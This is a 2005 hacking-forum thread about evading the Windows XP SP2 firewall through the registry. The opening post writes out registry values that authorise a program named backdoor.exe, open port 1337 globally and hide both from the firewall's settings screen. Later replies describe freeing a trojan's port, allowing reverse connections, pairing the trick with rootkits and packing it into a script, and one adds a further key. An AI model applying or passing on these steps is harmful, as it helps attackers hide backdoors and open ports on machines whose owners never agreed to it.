Forums: Bypassing Windows Firewall - Forums

Jump to content

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

Bypassing Windows Firewall XP SP2 example

#1 User is offline   da_cash 

  • Sergeant
  • Icon
  • Group: Members
  • Posts: 232
  • Joined: 27-January 04

Posted 22 February 2005 - 12:35 AM

We can bypass windows firewall using registry.

Just open regedit.exe and go to

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List


As you can see the sharedaccess service aka windows firewall contains the names of applications allowed for outbound connections.

Tto give access to the desired application we need to add similiar key:
C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled


But then out "backdoor" will be listed in Firewall GUI allowed applications.

Anyway we may hide it by making this

C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled:@xpsp2res.dll,-22019"



We can also open globally any port we want
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List


by adding similiar value inside this registry key

"1337:TCP"="1337:TCP:*:Enabled:Name"


Where "Name" is the name we want to be showed in the GUI

To hide port from listing in the GUI mode we may make something like that


1337:TCP:*:Enabled:@xpsp2res.dll,-22003


an then the port will be hidden from listing (XP SP2)..



It works on XP SP2 i didn't tested it on any other os.

This method is used by some malware /spyware manufacturers and together with rootkit it may be reallly dangerous.
0

#2 User is offline   Jumpi 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 63
  • Joined: 02-January 04

Posted 22 February 2005 - 03:48 AM

i use to free the port my trojan uses. it works with a single commandline, i'm gonna lok for it when i'm at home again.

a reverse-connection was never stopped by the sp2-firewall, this seems to be the best method at the moment cause you don't see anything strange in the firewallsettings
0

#3 User is offline   o0oKARo0o 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 122
  • Joined: 29-January 04

Posted 23 February 2005 - 04:28 AM

It does work, excellent tip ;)
0

#4 User is offline   knull 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 22
  • Joined: 30-December 03

Posted 23 February 2005 - 05:56 AM

good, good, good...

BN says:
This was the 3rd useless post in 21 posts. Disabled account 28 days. Any other takers?

0

#5 User is offline   o0oKARo0o 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 122
  • Joined: 29-January 04

Posted 23 February 2005 - 06:11 AM

Actually it works but it still in the list but under remote assistance, any ideas ?
And using a rootkit, aftewards, the connection isnt allowed by firewall anymore dut to the inexistence of the program...
0

#6 User is offline   ninar12 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 143
  • Joined: 07-September 04

Posted 23 February 2005 - 09:28 AM

one question why dont u use "netsh"

netsh firewall ...


much confortable

but i dont know if its a native commant under nt
xp im sure it works
0

#7 User is offline   Lie8 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 40
  • Joined: 05-October 04

Posted 27 February 2005 - 02:11 AM

very very good tut .... thnx

BN says:
This person had 3 useless posts out of 10. Another 28-day winner!

0

#8 User is offline   dw-chow 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 127
  • Joined: 25-March 04

Posted 03 June 2005 - 10:32 PM

nice, but one question still remains... is it possible to get through it by remote means?
0

#9 User is offline   bah 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 80
  • Joined: 01-January 04

Posted 06 June 2005 - 02:22 PM

Actually I have another question I checked on win3k for the reg keys
and couldnt find any even though windows firewall was up and applications
had been added to exempt list from the gui, so were are the win3k
reg keys and does the :@xpsp2res.dll,-22003 work under w3k ?
0

#10 User is offline   AdmiralB 

  • Sergeant First Class
  • Icon
  • Group: Members
  • Posts: 312
  • Joined: 24-December 03

Posted 25 June 2005 - 05:49 PM

maybe some1 can compile into a nice bat file
0

#11 User is offline   smith_john 

  • Private
  • Icon
  • Group: Members
  • Posts: 8
  • Joined: 12-March 04

Posted 26 June 2005 - 12:27 AM

nice topic


From Packet: Sounds like a thx post to me! Warning points added. And from a chronic thanks poster so muchos suspend too.
0

#12 User is offline   Jackson 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 22
  • Joined: 27-December 03

Posted 27 June 2005 - 01:12 AM

Hello Really idea!! However, somebody can pack in regfile then one only must explain! And how is that with other Firewalls this functions there just??
0

#13 User is offline   bubilla 

  • Private
  • Icon
  • Group: Members
  • Posts: 10
  • Joined: 10-March 04

Posted 31 October 2005 - 02:49 AM

To open the ports you also have to add the following key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List\1337:TCP="1337:TCP:*:Enabled:Name"
0

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users

  • Share



Our Sponsors:


SwiftLayer Affiliate Web Hosting